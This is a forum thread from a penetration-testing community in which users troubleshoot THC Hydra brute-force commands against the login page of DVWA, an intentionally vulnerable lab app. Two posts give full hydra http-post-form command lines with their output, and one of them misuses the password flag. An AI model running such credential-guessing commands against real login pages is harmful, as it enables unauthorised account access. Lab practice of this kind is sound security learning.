Results 1 to 3 of 3

Thread: Hydra brute force on login.php

  1. #1
    Just burned his ISO
    Join Date
    Sep 2011
    Posts
    1

    Default Hydra brute force on login.php

    Hello,
    I'm trying to brute force my dvwa, so I know that username and password is correct, but I must not be doing something right (user issue).... Below is the output and command string I'm using. No matter what username and password I use, I get the same output, so I know it can not be working. Could someone please help me find what other form or string I'm missing? Thank you very much!

    root@bt:~# hydra -V -l admin -p XXXXX -s 80 -f 172.31.253.11 http-post-form "/dvwa/login.php:usrname=^USER^&pass=^PASS^&submit=Login: Login failed"

    Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
    Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 09:48:37
    [DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
    [DATA] attacking service http-post-form on port 80
    [STATUS] attack finished for 172.31.253.11 (waiting for children to finish)
    [ATTEMPT] target 172.31.253.11 - login "admin" - pass "XXXXX" - child 0 - 1 of 1
    Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-16 09:48:37

  2. #2
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    7

    Default Re : Hydra brute force on login.php

    hi,

    maybe you should try hydra v7, the changelog said the http-form module has been updated

  3. #3

    Default Re: Hydra brute force on login.php

    Hi,

    I'm not sure that the latest Hydra, 7.4.2, can even guess something. Today I've done some tests using DVWA's BruteForce module and the output was the same for the both situation when the wordlist file contains or not the correct password:

    hydra -V -l admin -p /media/Pluto/final-wordlist.lst -s 80 -f 192.168.71.138 http-post-form "/dvwa/login.php:username=^USER^&pass=^PASS^&submit=Login : Login failed"
    Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

    Hydra (http://www.thc.org/thc-hydra) starting at 2013-02-10 00:40:33
    [DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
    [DATA] attacking service http-post-form on port 80
    [ATTEMPT] target 192.168.71.138 - login "admin" - pass "/media/Pluto/final-wordlist.lst" - 1 of 1 [child 0]
    [80][www-form] host: 192.168.71.138 login: admin password: /media/Pluto/final-wordlist.lst
    [STATUS] attack finished for 192.168.71.138 (valid pair found)
    1 of 1 target successfully completed, 1 valid password found - It doesn't say which password anyway
    Hydra (http://www.thc.org/thc-hydra) finished at 2013-02-10 00:40:33

    Now I'm wonder, do I miss something or I'm doing something wrong?
    Everyone has started from ZERO. I'm not an exception but I'm trying to hear more than speak too much.

    http://pentestconsultancy.blogspot.ro

Similar Threads

  1. THC Hydra and HTTP brute-force cracking
    By m4rtin in forum Beginners Forum
    Replies: 0
    Last Post: 03-30-2011, 04:51 PM
  2. wordpressbf - WordPress Brute Force (wp-login.php)
    By firebits in forum Tool Requests
    Replies: 0
    Last Post: 09-30-2010, 05:33 PM
  3. Brute force a .cap
    By grahamb314 in forum OLD Newbie Area
    Replies: 2
    Last Post: 01-02-2010, 02:49 PM
  4. brute force hydra?
    By tangentcollision in forum OLD Pentesting
    Replies: 15
    Last Post: 11-12-2009, 02:54 PM
  5. THC Hydra brute force router.
    By arckeda in forum OLD BackTrack 3 Final
    Replies: 8
    Last Post: 07-09-2008, 10:41 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •